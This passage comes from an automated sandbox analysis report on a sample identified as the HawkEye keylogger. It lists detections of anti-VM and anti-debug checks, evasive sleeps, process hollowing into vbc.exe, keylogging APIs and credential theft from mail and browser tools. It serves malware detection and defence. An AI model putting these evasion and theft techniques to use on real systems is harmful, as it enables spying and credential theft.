                          Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                          Malware Analysis System Evasion:

                          barindex
                          Yara detected AntiVM_3Show sources
                          Source: Yara matchFile source: Process Memory Space: Windows Update.exe PID: 2360, type: MEMORY
                          Source: Yara matchFile source: Process Memory Space: Sample_B.exe PID: 2368, type: MEMORY
                          Source: C:\Users\user\AppData\Roaming\Windows Update.exeCode function: GetAdaptersInfo,2_2_00642E9A
                          Source: C:\Users\user\AppData\Roaming\Windows Update.exeCode function: GetAdaptersInfo,2_2_00642E72
                          Source: C:\Users\user\Desktop\Sample_B.exeThread delayed: delay time: 922337203685477Jump to behavior
                          Source: C:\Users\user\Desktop\Sample_B.exeThread delayed: delay time: 922337203685477Jump to behavior
                          Source: C:\Users\user\AppData\Roaming\Windows Update.exeThread delayed: delay time: 922337203685477Jump to behavior
                          Source: C:\Users\user\AppData\Roaming\Windows Update.exeThread delayed: delay time: 922337203685477Jump to behavior
                          Source: C:\Users\user\AppData\Roaming\Windows Update.exeThread delayed: delay time: 180000Jump to behavior
                          Source: C:\Users\user\Desktop\Sample_B.exe TID: 284Thread sleep time: -922337203685477s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\Sample_B.exe TID: 2028Thread sleep time: -922337203685477s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Roaming\Windows Update.exe TID: 2504Thread sleep time: -922337203685477s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Roaming\Windows Update.exe TID: 2312Thread sleep time: -1020000s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Roaming\Windows Update.exe TID: 2908Thread sleep time: -120000s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Roaming\Windows Update.exe TID: 2888Thread sleep time: -140000s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Roaming\Windows Update.exe TID: 2920Thread sleep time: -60000s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Roaming\Windows Update.exe TID: 2912Thread sleep time: -1844674407370954s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Roaming\Windows Update.exe TID: 2912Thread sleep time: -1400000s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Roaming\Windows Update.exe TID: 2460Thread sleep time: -180000s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Roaming\Windows Update.exeWMI Queries: IWbemServices::CreateInstanceEnum - Win32_Processor
                          Source: Sample_B.exe, 00000000.00000002.2075920870.00000000004FB000.00000004.00000020.sdmpBinary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
                          Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information queried: ProcessInformationJump to behavior
                          Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess queried: DebugPortJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeProcess queried: DebugPortJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeProcess queried: DebugPortJump to behavior
                          Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess token adjusted: DebugJump to behavior
                          Source: C:\Users\user\Desktop\Sample_B.exeMemory allocated: page read and write | page guardJump to behavior

                          HIPS / PFW / Operating System Protection Evasion:

                          barindex
                          .NET source code references suspicious native API functionsShow sources
                          Source: Sample_B.exe, Form1.csReference to suspicious API methods: ('GetAsyncKeyState', 'GetAsyncKeyState@user32')
                          Source: Sample_B.exe, RunPE.csReference to suspicious API methods: ('ReadProcessMemory', 'ReadProcessMemory@kernel32'), ('WriteProcessMemory', 'WriteProcessMemory@kernel32'), ('VirtualProtectEx', 'VirtualProtectEx@kernel32'), ('VirtualAllocEx', 'VirtualAllocEx@kernel32')
                          Source: Windows Update.exe.0.dr, Form1.csReference to suspicious API methods: ('GetAsyncKeyState', 'GetAsyncKeyState@user32')
                          Source: Windows Update.exe.0.dr, RunPE.csReference to suspicious API methods: ('ReadProcessMemory', 'ReadProcessMemory@kernel32'), ('WriteProcessMemory', 'WriteProcessMemory@kernel32'), ('VirtualProtectEx', 'VirtualProtectEx@kernel32'), ('VirtualAllocEx', 'VirtualAllocEx@kernel32')
                          Source: 0.0.Sample_B.exe.bc0000.0.unpack, Form1.csReference to suspicious API methods: ('GetAsyncKeyState', 'GetAsyncKeyState@user32')
                          Source: 0.0.Sample_B.exe.bc0000.0.unpack, RunPE.csReference to suspicious API methods: ('ReadProcessMemory', 'ReadProcessMemory@kernel32'), ('WriteProcessMemory', 'WriteProcessMemory@kernel32'), ('VirtualProtectEx', 'VirtualProtectEx@kernel32'), ('VirtualAllocEx', 'VirtualAllocEx@kernel32')
                          Source: 0.2.Sample_B.exe.bc0000.0.unpack, Form1.csReference to suspicious API methods: ('GetAsyncKeyState', 'GetAsyncKeyState@user32')
                          Source: 0.2.Sample_B.exe.bc0000.0.unpack, RunPE.csReference to suspicious API methods: ('ReadProcessMemory', 'ReadProcessMemory@kernel32'), ('WriteProcessMemory', 'WriteProcessMemory@kernel32'), ('VirtualProtectEx', 'VirtualProtectEx@kernel32'), ('VirtualAllocEx', 'VirtualAllocEx@kernel32')
                          Source: WindowsUpdate.exe.2.dr, Form1.csReference to suspicious API methods: ('GetAsyncKeyState', 'GetAsyncKeyState@user32')
                          Source: WindowsUpdate.exe.2.dr, RunPE.csReference to suspicious API methods: ('ReadProcessMemory', 'ReadProcessMemory@kernel32'), ('WriteProcessMemory', 'WriteProcessMemory@kernel32'), ('VirtualProtectEx', 'VirtualProtectEx@kernel32'), ('VirtualAllocEx', 'VirtualAllocEx@kernel32')
                          Source: 2.2.Windows Update.exe.ee0000.1.unpack, Form1.csReference to suspicious API methods: ('GetAsyncKeyState', 'GetAsyncKeyState@user32')
                          Source: 2.2.Windows Update.exe.ee0000.1.unpack, RunPE.csReference to suspicious API methods: ('ReadProcessMemory', 'ReadProcessMemory@kernel32'), ('WriteProcessMemory', 'WriteProcessMemory@kernel32'), ('VirtualProtectEx', 'VirtualProtectEx@kernel32'), ('VirtualAllocEx', 'VirtualAllocEx@kernel32')
                          Source: 2.0.Windows Update.exe.ee0000.0.unpack, Form1.csReference to suspicious API methods: ('GetAsyncKeyState', 'GetAsyncKeyState@user32')
                          Source: 2.0.Windows Update.exe.ee0000.0.unpack, RunPE.csReference to suspicious API methods: ('ReadProcessMemory', 'ReadProcessMemory@kernel32'), ('WriteProcessMemory', 'WriteProcessMemory@kernel32'), ('VirtualProtectEx', 'VirtualProtectEx@kernel32'), ('VirtualAllocEx', 'VirtualAllocEx@kernel32')
                          Allocates memory in foreign processesShow sources
                          Source: C:\Users\user\AppData\Roaming\Windows Update.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000 protect: page execute and read and writeJump to behavior
                          Source: C:\Users\user\AppData\Roaming\Windows Update.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000 protect: page execute and read and writeJump to behavior
                          Injects a PE file into a foreign processesShow sources
                          Source: C:\Users\user\AppData\Roaming\Windows Update.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000 value starts with: 4D5AJump to behavior
                          Source: C:\Users\user\AppData\Roaming\Windows Update.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000 value starts with: 4D5AJump to behavior
                          Sample uses process hollowing techniqueShow sources
                          Source: C:\Users\user\AppData\Roaming\Windows Update.exeSection unmapped: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base address: 400000Jump to behavior
                          Source: C:\Users\user\AppData\Roaming\Windows Update.exeSection unmapped: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base address: 400000Jump to behavior
                          Writes to foreign memory regionsShow sources
                          Source: C:\Users\user\AppData\Roaming\Windows Update.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000Jump to behavior
                          Source: C:\Users\user\AppData\Roaming\Windows Update.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000Jump to behavior
                          Source: C:\Users\user\AppData\Roaming\Windows Update.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000Jump to behavior
                          Source: C:\Users\user\AppData\Roaming\Windows Update.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000Jump to behavior
                          Source: C:\Users\user\Desktop\Sample_B.exeProcess created: C:\Users\user\AppData\Roaming\Windows Update.exe 'C:\Users\user\AppData\Roaming\Windows Update.exe' Jump to behavior
                          Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe dw20.exe -x -s 1708Jump to behavior
                          Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holdermail.txt'Jump to behavior
                          Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holderwb.txt'Jump to behavior
                          Source: C:\Users\user\Desktop\Sample_B.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                          Source: C:\Users\user\AppData\Roaming\Windows Update.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM AntivirusProduct
                          Source: C:\Users\user\AppData\Roaming\Windows Update.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM FirewallProduct

                          Stealing of Sensitive Information:

                          barindex
                          Yara detected HawkEye KeyloggerShow sources
                          Source: Yara matchFile source: Sample_B.exe, type: SAMPLE
                          Source: Yara matchFile source: 00000000.00000002.2076206862.0000000000BC2000.00000020.00020000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000002.00000002.2111753690.0000000000EE2000.00000020.00020000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000002.00000000.2075201287.0000000000EE2000.00000020.00020000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000002.00000003.2082749506.00000000054A9000.00000004.00000001.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000000.00000000.2069232329.0000000000BC2000.00000020.00020000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000002.00000002.2111820758.0000000002371000.00000004.00000001.sdmp, type: MEMORY
                          Source: Yara matchFile source: Process Memory Space: Windows Update.exe PID: 2360, type: MEMORY
                          Source: Yara matchFile source: Process Memory Space: Sample_B.exe PID: 2368, type: MEMORY
                          Source: Yara matchFile source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Users\user\AppData\Roaming\Windows Update.exe, type: DROPPED
                          Source: Yara matchFile source: 0.2.Sample_B.exe.bc0000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0.0.Sample_B.exe.bc0000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 2.2.Windows Update.exe.ee0000.1.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0.0.Sample_B.exe.bc8208.3.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 2.0.Windows Update.exe.ee0000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 2.2.Windows Update.exe.f3fa72.2.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 2.2.Windows Update.exe.ee9c0d.4.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0.2.Sample_B.exe.bc9c0d.3.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 2.3.Windows Update.exe.54aec22.0.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0.0.Sample_B.exe.bc9c0d.1.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0.0.Sample_B.exe.c1fa72.2.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0.2.Sample_B.exe.c1fa72.2.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 2.0.Windows Update.exe.ee8208.2.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 2.0.Windows Update.exe.f3fa72.3.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 2.2.Windows Update.exe.ee8208.3.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0.2.Sample_B.exe.bc8208.1.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 2.0.Windows Update.exe.ee9c0d.1.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 2.2.Windows Update.exe.2392140.5.raw.unpack, type: UNPACKEDPE
                          Yara detected MailPassViewShow sources
                          Source: Yara matchFile source: Sample_B.exe, type: SAMPLE
                          Source: Yara matchFile source: 00000002.00000002.2112485117.0000000003371000.00000004.00000001.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000000.00000002.2076206862.0000000000BC2000.00000020.00020000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000002.00000002.2111753690.0000000000EE2000.00000020.00020000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000002.00000000.2075201287.0000000000EE2000.00000020.00020000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000002.00000003.2082749506.00000000054A9000.00000004.00000001.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000000.00000000.2069232329.0000000000BC2000.00000020.00020000.sdmp, type: MEMORY
                          Source: Yara matchFile source: Process Memory Space: Windows Update.exe PID: 2360, type: MEMORY
                          Source: Yara matchFile source: Process Memory Space: Sample_B.exe PID: 2368, type: MEMORY
                          Source: Yara matchFile source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Users\user\AppData\Roaming\Windows Update.exe, type: DROPPED
                          Source: Yara matchFile source: 0.2.Sample_B.exe.c1fa72.2.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0.0.Sample_B.exe.c1fa72.2.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 2.0.Windows Update.exe.f3fa72.3.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 2.2.Windows Update.exe.f3fa72.2.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0.2.Sample_B.exe.bc0000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 2.2.Windows Update.exe.3377e00.7.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 2.2.Windows Update.exe.3377e00.7.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0.0.Sample_B.exe.bc0000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 2.2.Windows Update.exe.ee0000.1.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0.0.Sample_B.exe.bc8208.3.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 2.0.Windows Update.exe.ee0000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 2.2.Windows Update.exe.f3fa72.2.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 2.3.Windows Update.exe.54aec22.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 2.2.Windows Update.exe.ee9c0d.4.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0.2.Sample_B.exe.bc9c0d.3.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 2.3.Windows Update.exe.54aec22.0.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0.0.Sample_B.exe.bc9c0d.1.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0.0.Sample_B.exe.c1fa72.2.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0.2.Sample_B.exe.c1fa72.2.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 2.0.Windows Update.exe.ee8208.2.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 2.0.Windows Update.exe.f3fa72.3.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 2.2.Windows Update.exe.ee8208.3.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0.2.Sample_B.exe.bc8208.1.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 2.0.Windows Update.exe.ee9c0d.1.raw.unpack, type: UNPACKEDPE
                          Yara detected WebBrowserPassView password recovery toolShow sources
                          Source: Yara matchFile source: Sample_B.exe, type: SAMPLE
                          Source: Yara matchFile source: 00000002.00000002.2112965167.0000000003610000.00000004.00000001.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000000.00000002.2076206862.0000000000BC2000.00000020.00020000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000002.00000002.2111753690.0000000000EE2000.00000020.00020000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000002.00000000.2075201287.0000000000EE2000.00000020.00020000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000000.00000000.2069232329.0000000000BC2000.00000020.00020000.sdmp, type: MEMORY
                          Source: Yara matchFile source: Process Memory Space: Windows Update.exe PID: 2360, type: MEMORY
                          Source: Yara matchFile source: Process Memory Space: Sample_B.exe PID: 2368, type: MEMORY
                          Source: Yara matchFile source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Users\user\AppData\Roaming\Windows Update.exe, type: DROPPED
                          Source: Yara matchFile source: 0.0.Sample_B.exe.bc9c0d.1.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0.2.Sample_B.exe.bc0000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0.0.Sample_B.exe.bc0000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 2.2.Windows Update.exe.ee0000.1.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0.0.Sample_B.exe.bc8208.3.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 2.0.Windows Update.exe.ee0000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 2.2.Windows Update.exe.36114d0.8.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 2.2.Windows Update.exe.ee9c0d.4.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0.2.Sample_B.exe.bc9c0d.3.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0.0.Sample_B.exe.bc9c0d.1.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 2.2.Windows Update.exe.36114d0.8.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0.2.Sample_B.exe.bc9c0d.3.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 2.0.Windows Update.exe.ee9c0d.1.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 2.2.Windows Update.exe.ee9c0d.4.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 2.0.Windows Update.exe.ee8208.2.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 2.2.Windows Update.exe.ee8208.3.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0.2.Sample_B.exe.bc8208.1.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 2.0.Windows Update.exe.ee9c0d.1.raw.unpack, type: UNPACKEDPE

                          Remote Access Functionality:

                          barindex
                          Detected HawkEye RatShow sources
                          Source: Sample_B.exeString found in binary or memory: HawkEye_Keylogger_Stealer_Records_
                          Source: Sample_B.exeString found in binary or memory: HawkEyeKeylogger
                          Source: Sample_B.exeString found in binary or memory: HawkEye_Keylogger_Keylog_Records_
                          Source: Sample_B.exeString found in binary or memory: HawkEye_Keylogger_Execution_Confirmed_
                          Source: Sample_B.exe, 00000000.00000002.2076206862.0000000000BC2000.00000020.00020000.sdmpString found in binary or memory: \pidloc.txt!HawkEyeKeylogger
                          Source: Sample_B.exe, 00000000.00000002.2076206862.0000000000BC2000.00000020.00020000.sdmpString found in binary or memory: DisablenotifyMHawkEye_Keylogger_Execution_Confirmed_.txtUHawkEye Keylogger | Execution Confirmed |
                          Source: Sample_B.exe, 00000000.00000002.2076206862.0000000000BC2000.00000020.00020000.sdmpString found in binary or memory: ==============================================EHawkEye_Keylogger_Stealer_Records_MHawkEye Keylogger | Stealer Records |
                          Source: Sample_B.exe, 00000000.00000002.2076206862.0000000000BC2000.00000020.00020000.sdmpString found in binary or memory: .jpegCHawkEye_Keylogger_Keylog_Records_
                          Source: Windows Update.exeString found in binary or memory: HawkEye_Keylogger_Stealer_Records_
                          Source: Windows Update.exeString found in binary or memory: HawkEyeKeylogger
                          Source: Windows Update.exeString found in binary or memory: HawkEye_Keylogger_Keylog_Records_
                          Source: Windows Update.exeString found in binary or memory: HawkEye_Keylogger_Execution_Confirmed_
                          Source: Windows Update.exe, 00000002.00000002.2111753690.0000000000EE2000.00000020.00020000.sdmpString found in binary or memory: \pidloc.txt!HawkEyeKeylogger
                          Source: Windows Update.exe, 00000002.00000002.2111753690.0000000000EE2000.00000020.00020000.sdmpString found in binary or memory: DisablenotifyMHawkEye_Keylogger_Execution_Confirmed_.txtUHawkEye Keylogger | Execution Confirmed |
                          Source: Windows Update.exe, 00000002.00000002.2111753690.0000000000EE2000.00000020.00020000.sdmpString found in binary or memory: ==============================================EHawkEye_Keylogger_Stealer_Records_MHawkEye Keylogger | Stealer Records |
                          Source: Windows Update.exe, 00000002.00000002.2111753690.0000000000EE2000.00000020.00020000.sdmpString found in binary or memory: .jpegCHawkEye_Keylogger_Keylog_Records_
                          Source: Windows Update.exe, 00000002.00000002.2111820758.0000000002371000.00000004.00000001.sdmpString found in binary or memory: q'&HawkEye_Keylogger_Execution_Confirmed_
                          Source: Windows Update.exe, 00000002.00000002.2111820758.0000000002371000.00000004.00000001.sdmpString found in binary or memory: q#"HawkEye_Keylogger_Stealer_Records_
                          Source: Sample_B.exeString found in binary or memory: \pidloc.txt!HawkEyeKeylogger
                          Source: Sample_B.exeString found in binary or memory: DisablenotifyMHawkEye_Keylogger_Execution_Confirmed_.txtUHawkEye Keylogger | Execution Confirmed |
                          Source: Sample_B.exeString found in binary or memory: ==============================================EHawkEye_Keylogger_Stealer_Records_MHawkEye Keylogger | Stealer Records |
                          Source: Sample_B.exeString found in binary or memory: .jpegCHawkEye_Keylogger_Keylog_Records_
                          Yara detected HawkEye KeyloggerShow sources
                          Source: Yara matchFile source: Sample_B.exe, type: SAMPLE
                          Source: Yara matchFile source: 00000000.00000002.2076206862.0000000000BC2000.00000020.00020000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000002.00000002.2111753690.0000000000EE2000.00000020.00020000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000002.00000000.2075201287.0000000000EE2000.00000020.00020000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000002.00000003.2082749506.00000000054A9000.00000004.00000001.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000000.00000000.2069232329.0000000000BC2000.00000020.00020000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000002.00000002.2111820758.0000000002371000.00000004.00000001.sdmp, type: MEMORY
                          Source: Yara matchFile source: Process Memory Space: Windows Update.exe PID: 2360, type: MEMORY
                          Source: Yara matchFile source: Process Memory Space: Sample_B.exe PID: 2368, type: MEMORY
                          Source: Yara matchFile source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Users\user\AppData\Roaming\Windows Update.exe, type: DROPPED
                          Source: Yara matchFile source: 0.2.Sample_B.exe.bc0000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0.0.Sample_B.exe.bc0000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 2.2.Windows Update.exe.ee0000.1.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0.0.Sample_B.exe.bc8208.3.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 2.0.Windows Update.exe.ee0000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 2.2.Windows Update.exe.f3fa72.2.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 2.2.Windows Update.exe.ee9c0d.4.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0.2.Sample_B.exe.bc9c0d.3.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 2.3.Windows Update.exe.54aec22.0.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0.0.Sample_B.exe.bc9c0d.1.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0.0.Sample_B.exe.c1fa72.2.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0.2.Sample_B.exe.c1fa72.2.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 2.0.Windows Update.exe.ee8208.2.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 2.0.Windows Update.exe.f3fa72.3.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 2.2.Windows Update.exe.ee8208.3.raw.unpack, type: UNPACKEDPE
